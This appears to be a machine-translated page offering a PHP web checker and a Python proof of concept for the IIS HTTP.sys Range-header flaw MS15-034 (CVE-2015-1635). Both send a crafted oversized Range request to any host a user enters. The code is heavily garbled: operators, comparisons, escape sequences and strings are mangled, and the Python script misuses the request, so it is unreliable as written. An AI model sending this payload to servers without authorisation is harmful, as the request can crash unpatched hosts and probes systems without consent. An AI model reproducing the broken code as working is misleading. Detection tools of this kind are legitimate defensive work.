IIS latest high risk vulnerability (CVE-2015-1635, MS15-034) POC and Online Detection source code
HTTP. sys Remote Code Execution Vulnerability (CVE-2015-1635, MS15-034)
The remote code execution vulnerability exists in the HTTP protocol stack (HTTP. sys). This vulnerability occurs when HTTP. sys does not correctly analyze specially designed HTTP requests. Attackers who successfully exploit this vulnerability can execute arbitrary code in the context of the system account. Https://technet.microsoft.com/zh-cn/library/security/MS15-034
Online Detection source code
Php
Class VulnStatus {const FAIL = 0; const VULN = 1; const VULN_NOT_MS = 2; const PATCHED = 3; const NOT_VULN = 4; const NOT_VULN_MS = 5; const Limit = 6; public static function AsString ($ status, $ host) {switch ($ status) {case self: FAIL: return '; unable to connect ';. $ host. '; test the vulnerability. '; Case self: VULN: return';. $ host. '; the vulnerability exists. '; Case self: VULN_NOT_MS: return';. $ host. '; the vulnerability may exist, but it does not seem to use IIS. '; Case self: PATCHED: return';. $ host. '; fixed. '; Case self: NOT_VULN: return'; the patch status cannot be identified ';. $ host.';. IIS is not used and the vulnerability may not exist. '; Case self: NOT_VULN_MS: return'; the patch status cannot be identified ';. $ host.';. The vulnerability may not exist. '; Case self: NOT_VULN_CF: return';. $ host. '; CloudFlare CDN acceleration may be used, leading to vulnerability detection or non-existent. ';} Return'; seems to be broken '; ;}$ host = false; $ status = false; $ url = filter_input (INPUT_GET,'; host';, FILTER_SANITIZE_URL ); if (! Empty ($ url) & parse_url ($ url, PHP_URL_SCHEME) === null) {$ url = '; http ://';. $ url;} $ port = parse_url ($ url, PHP_URL_PORT); if ($ port = null) {$ port = 80 ;}$ url = parse_url ($ url, PHP_URL_HOST); if ($ url! = Null) {$ cachekey = '; ms15034 _';. $ url. ';_';. $ port; $ cachetime = 300; // 5 minutes $ host = htmlspecialchars ($ url, ENT_HTML5); if ($ port! = 80) {$ host. = ';:';. $ port;} $ memcached = new Memcached (); $ memcached-> addServer (';/var/run/memcached. sock ';, 0); $ status = $ memcached-> get ($ cachekey); if ($ status = false) {$ fp = @ fsockopen ($ url, $ port, $ errno, $ errstr, 5); if ($ fp = false) {$ status = VulnStatus: FAIL;} else {stream_set_timeout ($ fp, 5); $ header = "GET/HTTP/1.1 \ r \ n"; $ header. = "Host: stuff \ r \ n"; $ header. = "Rang E: bytes = 0-18446731673709551615 \ r \ n "; $ header. = "Connection: close \ r \ n"; fwrite ($ fp, $ header); $ response = fread ($ fp, 1024 ); fclose ($ fp); if (strpos ($ response, '; your request range does not match ';)! = False) {$ status = strpos ($ response, '; Microsoft';) = false? VulnStatus: VULN_NOT_MS: VulnStatus: VULN;} else if (strpos ($ response, '; Request an invalid header ';)! = False) {$ cachetime = 3600; // cache time $ status = VulnStatus: PATCHED;} else if (strpos ($ response, '; Microsoft ';) === false) {if (strpos ($ response, '; 403 Forbidden ';)! = False & strpos ($ response, '; cloudflare-nginx ';)! = False) {$ status = VulnStatus: NOT_VULN_CF;} else {$ status = VulnStatus: NOT_VULN ;}} else {$ status = VulnStatus: NOT_VULN_MS ;}} unset ($ fp, $ header, $ response); $ memcached-> set ($ cachekey, $ status, $ cachetime);} $ status = VulnStatus: AsString ($ status, $ host) ;}?> Charset = "UTF-8"> name = "theme-color" content = "#424242"> http-equiv = "X-UA-Compatible" content = "IE = edge, chrome = 1 "> name =" viewport "content =" width = device-width, initial-scale = 1.0 "> MS15-034 test href =" // maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css "rel =" stylesheet "> type =" text/css ">. container {max-width: 900px ;}. masthead {position: relative; padding: 20px 0; text-align: center; color: # fff; background-color: #424242; margin-bottom: 20px ;}. masthead a {color: # fff ;}. footer {text-align: center; padding: 15px; color: #555 ;}. footer span {color: # FA5994 ;}. form-inline {text-align: center; margin-bottom: 20px ;}. github {position: absolute; top: 0; right: 0 ;}
HTTP. sys Stack Vulnerability Test
Enter a URL or host name to test the server's href = "https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target = "_ blank"> MS15-034/href = "http://www.cve.mitre.org/cgi-bin/cvename.cgi? Name = CVE-2015-1635 "target =" _ blank "> CVE-2015-1635.
The HTTP protocol stack (HTTP. sys) causes remote code execution vulnerability when the HTTP protocol stack does not correctly analyze specially crafted HTTP requests. Attackers who successfully exploit this vulnerability can execute arbitrary code in the context of the system account.
To exploit this vulnerability, attackers must send a special HTTP request to the affected system. This update resolves this vulnerability by modifying the Windows HTTP protocol stack to process requests.
Id = "js-form" method = "GET"> php if ($ host! = False) {echo '; value = "';. $ host. ';"' ;;}?>> Type = "submit" class = "btn-primary btn-lg"> detect php if ($ status! ==False) {echo $ status ;}?>
Use Memcached distributed memory object cache system | all query results will be cached for five minutes
Vulnerability verification POC
Python version
#! /Usr/bin/env python _ author _ = '; jastra'; class bg_colors: VULN = '; 33 [92m'; NONVULN ='; 33 [95m '; EXPLOIT = '; 33 [91m'; try: import requests import retries t ImportError as ierr: print (bg_colors.EXPLOIT + "Error, looks like you don'; t have % s installed ", ierr) def identify_iis (domain): req = requests. get (str (domain) remote_server = req. headers ['; Server';] if "Microsoft-IIS" in remote_server: print (bg _ Colors. VULN + "[+] service is" + remote_server) ms15_034_test (str (domain) else: print (bg_colors.NONVULN + "[-] Not IIS \ n may be:" + remote_server) def ms15_034_test (domain): print ("START vuln check! ") Vuln_buffer =" GET/HTTP/1.1 \ r \ nHost: stuff \ r \ nRange: bytes = 0-18446731673709551615 \ r \ n "; req = requests. get (str (domain), params = vuln_buffer) if req. headers ['; content';] = "the request range does not match": print (bg_colors.EXPLOIT + "[+] vulnerability") else: print (bg_colors.EXPLOIT + "[-] IIS service cannot show whether the vulnerability exists. "+" manual detection required ") usr_domain = raw_input (" input domain name scan: ") identify_iis (usr_domain)